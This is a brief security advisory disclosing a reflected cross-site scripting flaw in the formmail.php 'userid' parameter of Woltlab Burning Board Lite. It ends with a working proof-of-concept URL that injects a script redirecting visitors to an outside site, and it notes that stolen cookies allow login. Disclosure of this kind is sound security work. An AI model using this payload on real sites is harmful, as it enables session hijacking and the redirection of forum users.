Security Advisory: Woltlab Burning Board Lite formmail.php XSS
Advisory Information
--------------------
Advisory name : Woltlab Burning Board Lite formmail.php XSS
Discovered by : drhankey / it-security23.net
Vendor Name : Woltlab
Vendor Homepage : http://www.woltlab.de
Software : Woltlab Burning Board Lite
Vulnerability Type : Cross-Site-Scripting
Vulnerable Versions : 1.0.0, 1.0.1e, maybe more
Platforms : OS Independent, PHP
What is Woltlab Burning Board Lite?
----------------------------------
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,
a PHP based bulletin board
Vulnerability Description:
-------------------------
formmail.php outputs the "userid"-parameter unfiltered, so its possible to add
arbitary Code to the output by using a malformed link.
The Board also allows logging in with stolen cookies.
Proof of Concept:
-----------------
http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";</script
x="y